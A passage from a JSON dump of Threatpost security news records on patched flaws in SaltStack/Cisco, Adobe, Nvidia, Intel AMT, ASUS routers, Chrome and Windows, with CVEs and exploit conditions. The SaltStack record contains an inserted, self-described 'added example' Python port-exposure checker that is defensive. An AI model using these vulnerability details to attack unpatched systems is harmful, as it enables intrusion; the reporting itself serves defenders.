Find out: Join breach expert Chip Witt from SpyCloud and Threatpost senior editor Tara Seals, in our upcoming free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_, \u201cTrends in Fortune 1000 Breach Exposure.\u201d _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-11-12T18:13:18", "type": "threatpost", "title": "Magento Warns E-Commerce Sites to Upgrade ASAP to Prevent Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-8144", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2019-11-12T18:13:18", "id": "THREATPOST:CA33E204EC4B2286ECCDD9C58B908175", "href": "https://threatpost.com/magento-warns-upgrade-asap/150115/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:19:14", "description": "Cisco said attackers have been able to compromise its servers after exploiting two known, critical [SaltStack vulnerabilities](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>). The flaws exist in the open-source Salt management framework, which is used in Cisco network-tooling products.\n\nTwo Cisco products incorporate a version of SaltStack that is running the vulnerable salt-master service. The first is Cisco Modeling Labs Corporate Edition (CML), which gives users a virtual sandbox environment to design and configure network topologies. The second is Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), used to design, configure and operate networks using versions of Cisco\u2019s network operating systems.\n\nHackers were able to successfully exploit the flaws in the Salt components incorporated in the latter product, resulting in the compromise of six VIRL-PE backend servers, according to Cisco. 
Those servers are: us-1.virl.info, us-2.virl.info, us-3.virl.info, us-4.virl.info, vsm-us-1.virl.info and vsm-us-2.virl.info.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCisco infrastructure maintains the salt-master servers that are used with Cisco VIRL-PE,\u201d according to [Cisco\u2019s Thursday alert](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG>). \u201cThose servers were upgraded on May 7, 2020. Cisco identified that the Cisco maintained salt-master servers that are servicing Cisco VIRL-PE releases 1.2 and 1.3 were compromised.\u201d\n\nCisco said the servers were remediated on May 7. The company also released software updates for the two vulnerable products. Cisco said that the update is \u201ccritical,\u201d ranking it 10 out of 10 on the CVSS scale.\n\nThe SaltStack bugs were first made public by the Salt Open Core team on April 29. The flaws can allow full remote code execution as root on servers in data centers and cloud environments. They include an authentication bypass issue, tracked as CVE-2020-11651, and a directory-traversal flaw, CVE-2020-11652, where untrusted inputs (i.e. parameters in network requests) are not sanitized correctly. 
This in turn allows access to the entire file system of the master server, researchers found.\n\nSaltStack released patches for the flaws in [release 3000.2](<https://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html>) on April 30. However, researchers with F-Secure, who discovered the flaws, said a preliminary scan revealed more than 6,000 potentially vulnerable Salt instances exposed to the public internet, and warned that exploits in the wild were imminent.\n\nThose predictions proved true: at the beginning of May, for instance, hackers targeted the publishing platform Ghost by exploiting the critical [SaltStack vulnerabilities](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>) in Ghost\u2019s server-management infrastructure, launching a cryptojacking attack against its servers that led to widespread outages.\n\nCisco said that for Cisco CML and Cisco VIRL-PE (software releases 1.5 and 1.6), if the salt-master service is enabled, \u201cthe exploitability of the product depends on how the product has been deployed.\u201d A full list of the impact and recommended action for each deployment option, for each Cisco software release, [can be found on Cisco\u2019s alert](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG>).\n\nTo be exploited, the salt-master service must be reachable on TCP ports 4505 and 4506, Cisco said. 
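The reachability condition Cisco states (salt-master listening on TCP 4505 and 4506) is quick to verify on the master itself. The following Python is an added example, not Cisco's or SaltStack's code: it parses the listening sockets reported by `ss -Hltn` on a Linux master and reports any salt port bound to something other than a loopback address, treating 0.0.0.0, * and :: as reachable from the network. The `ss` output embedded in the block is constructed for the example, and the optional active check assumes you are testing a master you own.

```python
"""Report salt-master ZeroMQ ports (4505 publish, 4506 request) that are
bound to something other than loopback.

Added example for this article, not Cisco's or SaltStack's code. It
parses the output of `ss -Hltn` captured on the master (assumption: a
Linux host with iproute2); the sample output below is constructed.
"""
import ipaddress
import socket

SALT_PORTS = {
    4505: "publish (minions subscribe here)",
    4506: "request (minions send auth and results here)",
}


def split_local_address(local: str):
    """Split ss's 'Local Address:Port' column, e.g. '[::]:4505' -> ('::', 4505)."""
    host, _, port = local.rpartition(":")
    return host.strip("[]"), int(port)


def is_loopback(host: str) -> bool:
    """'*' and the unspecified addresses mean every interface, never loopback."""
    if host in ("*", ""):
        return False
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return host == "localhost"


def exposed_salt_listeners(ss_output: str) -> dict:
    """Map each salt port found in LISTEN state to the address it is bound
    to, keeping only bindings a remote host could reach."""
    exposed = {}
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        host, port = split_local_address(fields[3])
        if port in SALT_PORTS and not is_loopback(host):
            exposed[port] = host
    return exposed


def tcp_reachable(host: str, port: int, timeout: float = 2.0) -> bool:
    """Active check from another host: can we complete a TCP handshake?
    Not exercised offline; run it only against a master you own."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


# Constructed `ss -Hltn` output from a master listening on all interfaces.
SAMPLE_SS = """\
LISTEN 0 1000 0.0.0.0:4505 0.0.0.0:*
LISTEN 0 1000 0.0.0.0:4506 0.0.0.0:*
LISTEN 0 128 127.0.0.1:8000 0.0.0.0:*
LISTEN 0 128 [::]:22 [::]:*
"""

# Constructed output from a host where the ports are loopback-only
# (for example a test master reached over an SSH tunnel): nothing is reported.
SAMPLE_SS_LOCAL = """\
LISTEN 0 1000 127.0.0.1:4505 0.0.0.0:*
LISTEN 0 1000 [::1]:4506 [::]:*
"""

if __name__ == "__main__":
    for port, host in sorted(exposed_salt_listeners(SAMPLE_SS).items()):
        print(f"salt {SALT_PORTS[port]} on {host}:{port} is network-reachable")
```

Minions legitimately need to reach both ports, so a non-loopback binding is not by itself a misconfiguration; the point of the check is to know which interfaces answer, restrict them with a host or network firewall to the minion population, and upgrade regardless, since a reachable unpatched master is exactly what the 6,000-instance internet scan counted.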
The company added that administrators can check their configured Cisco salt-master server by navigating to VIRL Server > Salt Configuration and Status.\n\n\u201cCisco continues to strongly recommend that customers upgrade to a fixed software release to remediate these vulnerabilities,\u201d Cisco said.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-28T20:51:25", "type": "threatpost", "title": "Hackers Compromise Cisco Servers Via SaltStack Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-05-28T20:51:25", "id": "THREATPOST:64DC6B60F693E46DD314DB70A547D319", "href": "https://threatpost.com/hackers-compromise-cisco-servers-saltstack/156091/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:24:10", "description": "Adobe has issued unscheduled patches for two critical vulnerabilities that, if exploited, enable an attacker to execute remote code on targeted devices.\n\nThe two apps affected by the critical flaws are Adobe After Effects, a visual effects and motion graphics app used for post-production film making and video game production, and Adobe Media Encoder, an 
application to help with media processing requirements for audio and video.\n\nBoth vulnerabilities can be exploited by a remote, unauthenticated attacker via the internet, and both exist \u201cdue to a boundary error when processing untrusted input,\u201d according to an [analysis of the flaws](<https://www.cybersecurity-help.cz/vdb/SB2020022010?affChecked=1>) after they were disclosed Wednesday evening. \u201cA remote attacker can create a specially crafted file, trick the victim into opening it using the affected software, trigger out-of-bounds write and execute arbitrary code on the target system.\u201d\n\nAdobe After Effects has an out-of-bounds write flaw ([CVE-2020-3765](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-3765>)), in which data is written past the bounds of an allocated buffer, corrupting adjacent memory with undefined or unexpected results. This could enable arbitrary code execution, according to [Adobe\u2019s update](<https://helpx.adobe.com/security/products/after_effects/apsb20-09.html>). Adobe After Effects versions 16.1.2 and earlier (for Windows) are affected. Users need to update to version 17.0.3, available on both Windows and macOS.\n\nWhile the vulnerability is critical in severity, the update has a priority 3 rating, which according to Adobe \u201cresolves vulnerabilities in a product that has historically not been a target for attackers. Adobe recommends administrators install the update at their discretion.\u201d\n\nThe other vulnerability, in Adobe Media Encoder, is also a critical out-of-bounds write vulnerability ([CVE-2020-3764](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3764>)) that could enable arbitrary code execution. 
Adobe Media Encoder versions 14.0 and earlier (for Windows) are impacted; the patched version is 14.0.2 (also in a \u201cpriority 3\u201d update).\n\n\u201cThe Media Encoder is a relatively straightforward open-and-own scenario,\u201d Dustin Childs, manager with Trend Micro\u2019s Zero Day Initiative (which discovered the flaw), told Threatpost. \u201cThe issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process.\u201d\n\nMatt Powell (for CVE-2020-3765) and Francis Provencher (for CVE-2020-3764) with Trend Micro\u2019s Zero Day Initiative were credited for discovering these vulnerabilities. Adobe said it is not aware of any exploits in the wild for either flaw.\n\nThese latest patches come a week after Adobe [issued its regularly scheduled fixes](<https://threatpost.com/adobe-security-update-critical-flash-framemaker-flaws/152782/>) for February, which stomped out flaws tied to 42 CVEs. Thirty-five of those flaws were critical in severity, including ones that affected its Framemaker and Flash Player products, which, if exploited, could lead to arbitrary code-execution. 
And, in [Adobe\u2019s January security update](<https://threatpost.com/adobe-patches-critical-illustrator-cc-flaws/151812/>), it addressed nine vulnerabilities overall, including ones in Adobe Illustrator CC and Adobe Experience Manager.\n", "cvss3": {}, "published": "2020-02-20T13:26:32", "type": "threatpost", "title": "Critical Adobe Flaws Fixed in Out-of-Band Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3764", "CVE-2020-3765"], "modified": "2020-02-20T13:26:32", "id": "THREATPOST:C7447BBBEA06E3A901BB1A9A66AB85FF", "href": "https://threatpost.com/critical-adobe-flaws-fixed-in-out-of-band-update/153060/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:23:31", "description": "Nvidia issued patches for high-severity vulnerabilities in its graphics driver, which can be exploited by a local attacker to launch denial-of-service (DoS) or code-execution attacks.\n\nNvidia\u2019s graphics processing unit (GPU) display driver is used in devices targeted for enthusiast gamers; it\u2019s the software component that enables the device\u2019s operating system and programs to use its high-level graphics hardware. Specifically impacted are display drivers used in GeForce, Quadro and Tesla-branded GPUs for Windows.\n\nThe most severe flaw exists in the control panel component of the graphics driver, which is a utility program helping users monitor and adjust the settings of their graphics adapter. 
According to [Nvidia](<https://nvidia.custhelp.com/app/answers/detail/a_id/4996>) in its security advisory, published Friday, an attacker with local system access can corrupt a system file in the control panel, which would lead to DoS or escalation of privileges.\n\nThe vulnerability ([CVE-2020-5957](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-5957>)) ranks 8.4 out of 10.0 on the CVSS scale, making it high-severity.\n\nAnother vulnerability, this one medium-severity, exists in the control panel of the graphics driver ([CVE-2020-5958](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-5958>)). An attacker with local system access could exploit this flaw by planting a malicious dynamic link library (DLL) file in the control panel, which may lead to code execution, DoS or information disclosure.\n\nFor both flaws in the graphics driver, the affected versions and subsequent patched versions are listed in the table below. Patched versions are now available, with the exception of a patch for vulnerable R440 versions of Tesla for Windows; fixes for that will be available in the week of March 9.\n\n[Table: affected and patched Nvidia driver versions (image)](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/02145301/nvidia.png>)\n\nNvidia also disclosed several vulnerabilities in the Virtual GPU (vGPU) Manager, its tool that enables multiple virtual machines to have simultaneous, direct access to a single physical GPU, while also using Nvidia graphics drivers deployed on non-virtualized operating systems.\n\nThe most severe of these flaws exists in the vGPU plugin, \u201cin which an input index value is incorrectly validated, which may lead to denial of service,\u201d according to Nvidia. 
The vulnerability ([CVE-2020-5959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-5959>)) is 7.8 out of 10.0 on the CVSS scale, making it high-severity.\n\nAnother medium-severity flaw ([CVE-2020-5960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-5960>)) in vGPU stems from the tool\u2019s kernel-mode driver (nvidia.ko), which is vulnerable to a null pointer dereference. This type of error occurs when a program attempts to read or write memory through a null pointer; in a kernel driver the result is a crash of the kernel rather than of a single process. The flaw can lead to denial of service, according to Nvidia.\n\nNvidia also addressed a medium-severity vulnerability in its vGPU graphics driver for guest operating systems. An \u201cincorrect resource clean up on a failure path\u201d in this driver can impact the guest virtual machine, leading to denial of service. A variety of versions are affected for these vGPU software flaws (they can be found [here](<https://nvidia.custhelp.com/app/answers/detail/a_id/4996>)); Nvidia said that updated versions are upcoming in March.\n\nIt\u2019s only the latest Nvidia security patch impacting its gaming-enthusiast customer base. Nvidia last year issued fixes for [high-severity flaws](<https://threatpost.com/gamers-hit-with-nvidia-gpu-driver-geforce-flaws/149992/>) in two popular gaming products, including its graphics driver for Windows and GeForce Experience. The flaws could be exploited to launch an array of malicious attacks \u2013 from DoS to escalation of privileges. 
Also in 2019, [Nvidia patched](<https://threatpost.com/nvidia-geforce-experience-bug/143196/>) another high-severity vulnerability in its GeForce Experience software, which could lead to code-execution or DoS of products, if exploited.\n", "cvss3": {}, "published": "2020-03-02T21:59:19", "type": "threatpost", "title": "Gamer Alert: Serious Nvidia Flaw Plagues Graphics Driver", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5957", "CVE-2020-5958", "CVE-2020-5960"], "modified": "2020-03-02T21:59:19", "id": "THREATPOST:EABA151827AA14E6292386F02B5ED8A1", "href": "https://threatpost.com/gamer-alert-serious-nvidia-flaw-plagues-graphics-driver/153380/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:14:13", "description": "Intel patched a critical privilege escalation vulnerability in its [Active Management Technology](<https://threatpost.com/intel-amt-loophole-allows-hackers-to-gain-control-of-some-pcs-in-under-a-minute/129408/>) (AMT), which is used for remote out-of-band management of PCs.\n\nAMT is part of the Intel vPro platform (Intel\u2019s umbrella marketing term for its collection of computer hardware technologies) and is primarily used by enterprise IT shops for remote management of corporate systems. The flaw can be exploited by an unauthenticated attacker on the same network, in order to gain escalated privileges. 
The issue ([CVE-2020-8758](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8758>)), found internally by Intel employees, ranks 9.8 out of 10 on the CVSS scale, making it critical severity, according to Intel in a [Tuesday security advisory](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00404.html>).\n\n\u201cWhile we are not aware of the AMT issue being used in active attacks, Intel has provided detection guidance to various security vendors who have released signatures into their intrusion detection/prevention products as an extra measure to help protect customers as they plan their deployment of this update,\u201d Jerry Bryant, director of communications with Intel Product Assurance and Security, [said in a security advisory posted Tuesday](<https://blogs.intel.com/technology/2020/09/intel-september-2020-security-advisories/#gs.f1r5rk>).\n\nThe flaw stems from improper buffer restrictions in a third-party network-subsystem component within Intel AMT (and Intel\u2019s Standard Manageability solution, ISM, which has a similar function to AMT).\n\nOne important factor that impacts how difficult the flaw is to exploit is whether or not AMT is \u201cprovisioned.\u201d In order to use AMT, systems must go through a process called \u201cprovisioning,\u201d which enrolls the computer with the remote system that will manage it (one provisioning method is inserting a specially formatted USB drive).\n\nIf AMT is provisioned, it may allow an unauthenticated user to potentially enable escalation of privilege via network access. 
However, an attacker would need to be authenticated and have local access to exploit the flaw if the AMT system is unprovisioned (if the system is unprovisioned, the flaw also has a lower CVSS score of 7.8 out of 10).\n\n\u201cIf the platform is configured to use Client Initiated Remote Access (CIRA) and environment detection is set to indicate that the platform is always outside the corporate network, the system is in CIRA-only mode and is not exposed to the network vector,\u201d said Bryant.\n\nAffected are Intel AMT and Intel ISM versions before 11.8.79, 11.12.79, 11.22.79, 12.0.68 and 14.0.39.\n\n\u201cIntel recommends that users of Intel AMT and Intel ISM update to the latest version provided by the system manufacturer that addresses these issues,\u201d according to Intel\u2019s advisory.\n\nIntel AMT has had security issues before. [Earlier in June](<https://threatpost.com/critical-intel-flaws-fixed-in-active-management-technology/156458/>), Intel patched two critical flaws ([CVE-2020-0594](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0594>) and [CVE-2020-0595](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0595>)) in the IPv6 subsystem of AMT. The flaws could potentially enable an unauthenticated user to gain elevated privileges via network access. And in 2018, a [loophole was discovered](<https://threatpost.com/intel-amt-loophole-allows-hackers-to-gain-control-of-some-pcs-in-under-a-minute/129408/>) in AMT that could have allowed an attacker to bypass logins and place backdoors on laptops, giving adversaries remote access to those machines.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. 
**[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-08T20:34:34", "type": "threatpost", "title": "Critical Intel Active Management Technology Flaw Allows Privilege Escalation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0594", "CVE-2020-0595", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-8758"], "modified": "2020-09-08T20:34:34", "id": "THREATPOST:FB2955E1812C33ECF441EDAEC41F4022", "href": "https://threatpost.com/critical-intel-active-management-technology-flaw-allows-privilege-escalation/159036/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:16:19", "description": "A pair of flaws in ASUS routers for the home could allow an attacker to compromise the devices \u2013 and eavesdrop on all of the traffic and data that flows through them.\n\nThe bugs are specifically found in the RT-AC1900P whole-home Wi-Fi model, within the router\u2019s firmware update functionality. 
The bugs were originally uncovered by Trustwave; ASUS has issued patches for them, and owners are urged to apply the updates as soon as they can.\n\nThe first issue (CVE-2020-15498) stems from a lack of certificate checking.\n\nThe router uses [GNU Wget](<https://www.gnu.org/software/wget/>) to fetch firmware updates from ASUS servers. It\u2019s possible to log in via SSH and use the Linux/Unix [\u201cgrep\u201d command](<https://www.geeksforgeeks.org/grep-command-in-unixlinux/>) to search through the filesystem for a specific string that indicates that the vulnerability is present: \u201c--no-check-certificate.\u201d\n\nIn vulnerable versions of the router, the files containing that string are shell scripts that perform downloads from the ASUS update servers, according to [Trustwave\u2019s advisory](<https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=27440>), issued on Thursday. This string indicates that there\u2019s no certificate checking, so an attacker could use untrusted (forged) certificates to force the install of malicious files on the targeted device.\n\nAn attacker would need to be connected to the vulnerable router to perform a man-in-the-middle (MITM) attack, which would allow that person complete access to all traffic going through the device.\n\nThe latest firmware eliminates the bug by no longer passing that Wget option.\n\nThe second bug (CVE-2020-15499) is a cross-site scripting (XSS) vulnerability in the Web Management interface related to firmware updates, according to Trustwave.\n\n\u201cThe release notes page did not properly escape the contents of the page before rendering it to the user,\u201d explained the firm. 
\u201cThis means that a legitimate administrator could be attacked by a malicious party using the first MITM finding and chaining it with arbitrary JavaScript code execution.\u201d\n\nASUS fixed this in the latest firmware so that the release notes page no longer renders arbitrary contents verbatim.\n\n\u201cSince routers like this one typically define the full perimeter of a network, attacks targeting them can potentially affect all traffic in and out of your network,\u201d warned Trustwave.\n\nASUS patched the issues in firmware version 3.0.0.4.385_20253.\n\nThe bug disclosure comes less than two weeks after a [bombshell security review](<https://threatpost.com/report-most-popular-home-routers-have-critical-flaws/157346/>) of 127 popular home routers found most contained at least one critical security flaw, according to researchers. Not only did all of the routers the researchers examined have flaws, many \u201care affected by hundreds of known vulnerabilities,\u201d the researchers said.\n\nOn average, the routers analyzed\u2014by vendors such as D-Link, Netgear, ASUS, Linksys, TP-Link and Zyxel\u2014were affected by 53 critical-rated vulnerabilities (CVE), with even the most \u201csecure\u201d device of the bunch having 21 CVEs, according to the report. 
Researchers did not list the specific vulnerabilities.\n", "cvss3": {}, "published": "2020-07-23T16:04:30", "type": "threatpost", "title": "ASUS Home Router Bugs Open Consumers to Snooping Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-15498", "CVE-2020-15499", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-07-23T16:04:30", "id": "THREATPOST:9234A5FE45618A7D601CF00D4A75748E", "href": "https://threatpost.com/asus-home-router-bugs-snooping-attacks/157682/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-15T22:21:53", "description": "On Thursday, Google released security patches to stomp out high-severity vulnerabilities in its Chrome browser. Patches for all the bugs Google disclosed in its security advisory roll out over the next few days.\n\nOverall, eight security bugs were addressed in Chrome [browser version 80.0.3987.162](<https://www.us-cert.gov/ncas/current-activity/2020/04/01/google-releases-security-updates-chrome>) for Windows, Mac, and Linux. The most severe of these flaws could allow for arbitrary code execution, according to the Center for Internet Security (CIS).\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities could allow an attacker to execute arbitrary code in the context of the browser,\u201d according to CIS [in a Wednesday alert](<https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-google-chrome-could-allow-for-arbitrary-code-execution_2020-044/>). \u201cDepending on the privileges associated with the application, an attacker could view, change, or delete data. 
If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.\u201d\n\nAs is typical for Chrome updates, Google initially releases few details about the bugs \u201cuntil a majority of users are updated with a fix.\u201d It did outline three of the vulnerabilities that were discovered by external researchers, however.\n\nThese included [two high-severity vulnerabilities](<https://chromereleases.googleblog.com/2020/03/stable-channel-update-for-desktop_31.html>) in the WebAudio component of Chrome (CVE-2020-6450 and CVE-2020-6451). The WebAudio component is used for processing and synthesizing audio in web applications.\n\nThe flaws tied to CVE-2020-6450 and CVE-2020-6451 are both [use-after-free flaws](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>). Use after free is a memory corruption flaw where an attempt is made to access memory after it has been freed. This can cause an array of malicious impacts, from causing a program to crash, to potentially leading to execution of arbitrary code.\n\n[According to vulnerability database Vuldb](<https://vuldb.com/?id.152684>), the flaw tied to CVE-2020-6450 could be exploited remotely and no form of authentication is required for exploitation. Both flaws were reported by Man Yue Mo of GitHub Security Lab on March 17.\n\nAnother vulnerability was discovered in the Media component of Chrome, which displays video and audio in browsers. The vulnerability (CVE-2020-6452) is a heap-based buffer overflow. A [buffer overflow](<https://cwe.mitre.org/data/definitions/122.html>) occurs when more data is written to a buffer (a region of memory used to temporarily store data) than it was allocated to hold; in a heap-based overflow, that buffer lives in the heap portion of memory (a region of a process\u2019s memory used to store dynamically allocated data). 
The data written past the end of that buffer corrupts nearby memory and could alter other data, opening the door for malicious attacks. This flaw was reported by a researcher under the alias \u201casnine\u201d on March 9.\n\nThe CIS alert recommended that Chrome users \u201capply the stable channel update provided by Google to vulnerable systems immediately after appropriate testing.\u201d\n\nChrome has been plagued by vulnerabilities over the past few months. Google [in February 2020 said](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>) it patched a Chrome web browser zero-day bug being actively exploited in the wild. The flaw affected versions of Chrome running on the Windows, macOS and Linux platforms.\n", 
"cvss3": {}, "published": "2020-04-02T21:19:27", "type": "threatpost", "title": "Google Squashes High-Severity Flaws in Chrome Browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-6450", "CVE-2020-6451", "CVE-2020-6452"], "modified": "2020-04-02T21:19:27", "id": "THREATPOST:CB31619614FD5E23CA0F7DEC57D992BE", "href": "https://threatpost.com/google-squashes-high-severity-flaws-in-chrome-browser/154424/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:15:01", "description": "Microsoft has released an out-of-band security update addressing two high-severity elevation-of-privilege (EoP) bugs. Both flaws exist in a service called Windows Remote Access, which provides remote-access capabilities to client applications on computers running Windows.\n\nOf note, both flaws were originally disclosed Aug. 11, during Microsoft\u2019s regularly scheduled Patch Tuesday updates, where the tech giant [patched 120 vulnerabilities overall](<https://threatpost.com/0-days-active-attack-bugs-patched-microsoft/158280/>). During those updates, fixes for the two flaws were issued for Windows 10, Windows 7, Windows Server 2008, 2012, 2016, and 2019; as well as Windows Server (versions 1903, 1909 and 2004). Wednesday\u2019s unscheduled updates fix the vulnerabilities in Windows 8.1 and Windows Server 2012.\n\n\u201cMicrosoft is announcing the availability of security update 4578013 for all supported versions of Microsoft 8.1 and Windows Server 2012 R2,\u201d according to [Microsoft\u2019s Wednesday advisory](<https://docs.microsoft.com/en-us/windows/release-information/windows-message-center#461>). \u201cCustomers running Windows 8.1 or Server 2012 R2 should install the update for their product to be protected from this vulnerability. 
Customers running other versions of Microsoft Windows or Windows Server do not need to take any action.\u201d\n\nThe first vulnerability ([CVE-2020-1530](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1530>)) stems from Windows Remote Access improperly handling memory. To exploit this vulnerability, an attacker would first need the ability to execute code on a target\u2019s system. An attacker could then run a specially crafted application to elevate privileges.\n\nThe flaw has a CVSS score of 7.8 out of 10, making it \u201cimportant\u201d in severity. However, it has not been observed being exploited in the wild, and Microsoft said that exploitation of the bug is \u201cless likely\u201d because attackers need to be able to execute code on the system before they can launch the attack. Symeon Paraschoudis of Pen Test Partners was credited with discovering the flaw.\n\n\u201cThe security update addresses the vulnerability by correcting how Windows Remote Access handles memory,\u201d according to Microsoft.\n\nThe second EoP flaw ([CVE-2020-1537](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1537>)), reported anonymously, stems from the Windows Remote Access service improperly handling file operations.\n\n\u201cTo exploit the vulnerability, an attacker would first need code execution on a victim system,\u201d according to Microsoft. \u201cAn attacker could then run a specially crafted application.\u201d\n\nAn attacker who successfully exploited this flaw could gain elevated privileges. The security update addresses the vulnerability by ensuring that Windows Remote Access properly handles file operations. 
This flaw also has a CVSS score of 7.8 out of 10, making it \u201cimportant\u201d in severity, but it has not been exploited.\n\nThe fixes come a week after Microsoft issued patches for two flaws under active attack as part of [its Patch Tuesday updates](<https://threatpost.com/0-days-active-attack-bugs-patched-microsoft/158280/>): One of the flaws ([CVE-2020-1464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1464>)), a Windows-spoofing bug tied to the validation of file signatures, allows an adversary to \u201cbypass security features intended to prevent improperly signed files from being loaded.\u201d The second ([CVE-2020-1380](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1380>)), a remote code-execution bug, is tied to the Internet Explorer web browser. A successful hack gives the attacker the same user rights as the current user, the company wrote.\n", 
"cvss3": {}, "published": "2020-08-20T15:39:38", "type": "threatpost", "title": "Microsoft Out-of-Band Security Update Fixes Windows Remote Access Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1380", "CVE-2020-1464", "CVE-2020-1530", "CVE-2020-1537", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-20T15:39:38", "id": "THREATPOST:197A12EF32429D29CF6A84B11763834D", "href": "https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:13:56", "description": "IBM has issued fixes for vulnerabilities in Spectrum Protect Plus, Big Blue\u2019s security tool found under the umbrella of its Spectrum data storage software branding. The flaws can be exploited by remote attackers to execute code on vulnerable systems.\n\nIBM Spectrum Protect Plus is a data-protection solution that provides near-instant recovery, replication, reuse and self-service for virtual machines. The vulnerabilities (CVE-2020-4703 and CVE-2020-4711) affect versions 10.1.0 through 10.1.6 of IBM Spectrum Protect Plus.\n\nThe more serious of the two flaws (CVE-2020-4703) exists in IBM Spectrum Protect Plus\u2019 Administrative Console and could allow an 